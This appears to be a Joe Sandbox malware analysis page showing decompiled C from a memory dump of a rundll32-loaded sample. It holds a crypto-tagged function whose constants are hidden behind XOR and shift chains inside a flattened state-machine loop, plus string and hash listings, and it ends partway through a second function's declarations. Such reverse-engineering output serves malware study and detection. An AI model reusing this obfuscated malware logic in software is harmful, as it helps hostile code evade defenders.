&Up, xrefs: 0035EC5C
u, xrefs: 0035E602

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
API String ID: 0-3417817227
Opcode ID: 6655adb2f258da87a704dabd99e38181a27686f9f15ea9bcdbef511b84c636d0
Instruction ID: 26d954def853ac8252e8559fd0b7574db104fb78656eb7000cd49b4d6ecb7d5a
Opcode Fuzzy Hash: 6655adb2f258da87a704dabd99e38181a27686f9f15ea9bcdbef511b84c636d0
Instruction Fuzzy Hash: 6782FFB1508381CFD379CF25C54AA8BBBE1BBD4718F10892DE5D99A260D7B48949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0034BB7E Relevance: 23.1, Strings: 18, Instructions: 637
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0034BB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E00354624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E0035DCF7(_v376, 0x341984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E00349462(_t701, _v368,  &_v116, E0035DCF7(_v268, 0x341814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E0034A8B0(_v352, _t701, _v360);
											E0034A8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E0034957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E0035DCF7(_v148, 0x341854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E00341C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x363dfc; // 0x0
														E0034ED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E0034A8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E0034B144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E0035DCF7(_v324, 0x341854, _t856);
																_pop(_t772);
																E0034AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E0034A8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E00342BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E0035CA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E0034A958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E0034A958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E003492C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}

0x0034bb84
0x0034bb9c
0x0034bba3
0x0034bba8
0x0034bbab
0x0034bbac
0x0034bbae
0x0034bbb3
0x0034bbb4
0x0034bbc7
0x0034bbce
0x0034bbd9
0x0034bbe4
0x0034bbf4
0x0034bbfb
0x0034bc06
0x0034bc0e
0x0034bc1b
0x0034bc1f
0x0034bc27
0x0034bc2f
0x0034bc3a
0x0034bc42
0x0034bc49
0x0034bc54
0x0034bc5c
0x0034bc64
0x0034bc69
0x0034bc71
0x0034bc79
0x0034bc84
0x0034bc8f
0x0034bc9a
0x0034bca5
0x0034bcad
0x0034bcc3
0x0034bcca
0x0034bcd5
0x0034bce7
0x0034bcec
0x0034bcf5
0x0034bd00
0x0034bd0b
0x0034bd16
0x0034bd21
0x0034bd29
0x0034bd36
0x0034bd39
0x0034bd3d
0x0034bd45
0x0034bd4d
0x0034bd58
0x0034bd63
0x0034bd6e
0x0034bd79
0x0034bd8f
0x0034bd9d
0x0034bda2
0x0034bdab
0x0034bdb6
0x0034bdc1
0x0034bdc9
0x0034bdd1
0x0034bdd9
0x0034bde1
0x0034bde9
0x0034bdf4
0x0034bdfb
0x0034be06
0x0034be11
0x0034be1c
0x0034be27
0x0034be32
0x0034be3d
0x0034be48
0x0034be53
0x0034be5e
0x0034be69
0x0034be74
0x0034be7f
0x0034be92
0x0034be95
0x0034be9c
0x0034bea4
0x0034beaf
0x0034bec5
0x0034becc
0x0034bed7
0x0034bee2
0x0034beea
0x0034bef2
0x0034beff
0x0034bf02
0x0034bf06
0x0034bf0e
0x0034bf19
0x0034bf24
0x0034bf2b
0x0034bf36
0x0034bf3e
0x0034bf43
0x0034bf4b
0x0034bf53
0x0034bf5b
0x0034bf63
0x0034bf6b
0x0034bf78
0x0034bf7c
0x0034bf84
0x0034bf90
0x0034bf93
0x0034bf97
0x0034bf9f
0x0034bfa7
0x0034bfaf
0x0034bfbc
0x0034bfc0
0x0034bfc8
0x0034bfcd
0x0034bfd5
0x0034bfe0
0x0034bfeb
0x0034bff8
0x0034c007
0x0034c00a
0x0034c00e
0x0034c013
0x0034c01b
0x0034c023
0x0034c033
0x0034c037
0x0034c03c
0x0034c044
0x0034c04c
0x0034c05f
0x0034c062
0x0034c069
0x0034c074
0x0034c07f
0x0034c08a
0x0034c095
0x0034c0a2
0x0034c0a6
0x0034c0ae
0x0034c0b6
0x0034c0be
0x0034c0c6
0x0034c0ce
0x0034c0d6
0x0034c0de
0x0034c0e6
0x0034c0f1
0x0034c0fc
0x0034c107
0x0034c112
0x0034c11d
0x0034c124
0x0034c12f
0x0034c137
0x0034c13f
0x0034c147
0x0034c14c
0x0034c154
0x0034c166
0x0034c16b
0x0034c174
0x0034c17f
0x0034c18a
0x0034c195
0x0034c19d
0x0034c1a8
0x0034c1b0
0x0034c1b8
0x0034c1c0
0x0034c1c5
0x0034c1cd
0x0034c1d8
0x0034c1e3
0x0034c1ee
0x0034c1fa
0x0034c1fd
0x0034c201
0x0034c206
0x0034c20e
0x0034c216
0x0034c223
0x0034c238
0x0034c23b
0x0034c242
0x0034c24d
0x0034c258
0x0034c26e
0x0034c275
0x0034c280
0x0034c293
0x0034c296
0x0034c29d
0x0034c2a8
0x0034c2b0
0x0034c2c0
0x0034c2c4
0x0034c2cc
0x0034c2d4
0x0034c2dc
0x0034c2e4
0x0034c2ec
0x0034c2f1
0x0034c2f9
0x0034c306
0x0034c307
0x0034c30b
0x0034c313
0x0034c31b
0x0034c323
0x0034c32e
0x0034c336
0x0034c341
0x0034c349
0x0034c351
0x0034c361
0x0034c365
0x0034c36d
0x0034c378
0x0034c380
0x0034c38b
0x0034c396
0x0034c3a3
0x0034c3a7
0x0034c3af
0x0034c3b7
0x0034c3cb
0x0034c3d2
0x0034c3dd
0x0034c3e8
0x0034c3f0
0x0034c3fa
0x0034c3fe
0x0034c406
0x0034c40e
0x0034c419
0x0034c424
0x0034c42c
0x0034c437
0x0034c43f
0x0034c447
0x0034c455
0x0034c456
0x0034c45b
0x0034c466
0x0034c46b
0x0034c46f
0x0034c477
0x0034c48a
0x0034c491
0x0034c49c
0x0034c4a7
0x0034c4b2
0x0034c4bd
0x0034c4c8
0x0034c4d0
0x0034c4dd
0x0034c4e6
0x0034c4ea
0x0034c4f2
0x0034c4fd
0x0034c505
0x0034c510
0x0034c51b
0x0034c523
0x0034c52e
0x0034c542
0x0034c549
0x0034c554
0x0034c55f
0x0034c572
0x0034c579
0x0034c584
0x0034c594
0x0034c5a1
0x0034c5a5
0x0034c5ad
0x0034c5b5
0x0034c5b9
0x0034c5c1
0x0034c5c9
0x0034c5d1
0x0034c5dc
0x0034c5e7
0x0034c5f2
0x0034c5fd
0x0034c608
0x0034c610
0x0034c61b
0x0034c623
0x0034c628
0x0034c62d
0x0034c635
0x0034c63d
0x0034c63d
0x0034c63d
0x0034c642
0x0034c642
0x0034c647
0x0034c647
0x0034c647
0x0034c64c
0x0034c64c
0x0034c64c
0x0034c64c
0x0034c64e
0x00000000
0x00000000
0x0034c654
0x0034c917
0x0034c91c
0x0034c924
0x0034c926
0x0034c92b
0x00000000
0x0034c65a
0x0034c660
0x0034c83b
0x0034c847
0x0034c852
0x0034c857
0x0034c865
0x0034c89e
0x0034c8a5
0x0034c8b4
0x0034c8c5
0x0034c8c8
0x0034c8d8
0x0034c8de
0x00000000
0x0034c666
0x0034c66c
0x0034ca66
0x0034ca7b
0x0034c672
0x0034c674
0x0034c779
0x0034c782
0x0034c790
0x0034c796
0x0034c799
0x0034c7a2
0x0034c7ac
0x0034c7e3
0x0034c7e8
0x0034c7eb
0x0034c7f2
0x0034c821
0x0034c7f4
0x0034c805
0x0034c812
0x0034c817
0x0034c81a
0x0034c81a
0x0034c830
0x00000000
0x0034c67a
0x0034c680
0x0034c76f
0x00000000
0x0034c686
0x0034c688
0x0034c752
0x0034c759
0x0034c765
0x0034c767
0x0034c63d
0x0034c63d
0x0034c63d
0x0034c642
0x0034c647
0x0034c647
0x00000000
0x0034c647
0x0034c68e
0x0034c68e
0x0034c694
0x0034c69a
0x0034c6a6
0x0034c6ae
0x0034c6b4
0x0034c6f8
0x0034c71c
0x0034c71f
0x0034c724
0x0034c727
0x0034c727
0x0034ca3e
0x0034ca3e
0x0034ca43
0x0034ca48
0x0034ca48
0x00000000
0x0034c694
0x0034c688
0x0034c680
0x0034c674
0x0034c66c
0x0034c660
0x0034ca85
0x0034ca8f
0x0034ca8f
0x0034c933
0x0034c935
0x0034ca2c
0x0034ca33
0x0034ca39
0x0034ca3b
0x00000000
0x0034c93b
0x0034c93b
0x0034c941
0x0034ca15
0x0034ca1b
0x00000000
0x0034c947
0x0034c947
0x0034c94d
0x0034c9f3
0x0034c9f9
0x0034c63d
0x0034c63d
0x0034c63d
0x00000000
0x0034c63d
0x0034c953
0x0034c953
0x0034c955
0x0034c9ce
0x0034c9d4
0x0034c63d
0x0034c63d
0x0034c63d
0x00000000
0x0034c63d
0x0034c957
0x0034c957
0x0034c95d
0x00000000
0x0034c963
0x0034c97c
0x0034c995
0x0034c99c
0x0034c9ab
0x0034c9ad
0x0034c9b2
0x0034c9b7
0x00000000
0x0034c9b7
0x0034c95d
0x0034c955
0x0034c94d
0x0034c941
0x00000000
0x0034ca4d
0x0034ca4d
0x00000000
0x0034ca59
0x0034c647
0x0034c642

Strings

O~t, xrefs: 0034C419
e(, xrefs: 0034C112
uP, xrefs: 0034C5C9
ll~, xrefs: 0034C0A6
PB5, xrefs: 0034BC3A
gc49, xrefs: 0034CA66
@_`, xrefs: 0034C2D4
;<=, xrefs: 0034BE53
iS, xrefs: 0034BC79
Y/c, xrefs: 0034C08A
tEt, xrefs: 0034C280
D#, xrefs: 0034C46F
vj, xrefs: 0034BE11
cg.B, xrefs: 0034C491
sJ, xrefs: 0034C0FC
CA, xrefs: 0034C349
ja*, xrefs: 0034C0D6
Kbf:, xrefs: 0034C579

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
API String ID: 0-258179307
Opcode ID: 4c61ce3e8a4f3d72fd8547d87869eccb3f0ed79657156ccec188c3eff82141ef
Instruction ID: 5ffb4b6092dbf8acbbdd1176af5d9f3876030a3988a4025daf02346e1d1a81c7
Opcode Fuzzy Hash: 4c61ce3e8a4f3d72fd8547d87869eccb3f0ed79657156ccec188c3eff82141ef
Instruction Fuzzy Hash: A172F271509381DFD379CF25C58AA9BBBE2BBC4304F10891DE6DA8A260D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00354B87 Relevance: 21.9, Strings: 17, Instructions: 604
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00354B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
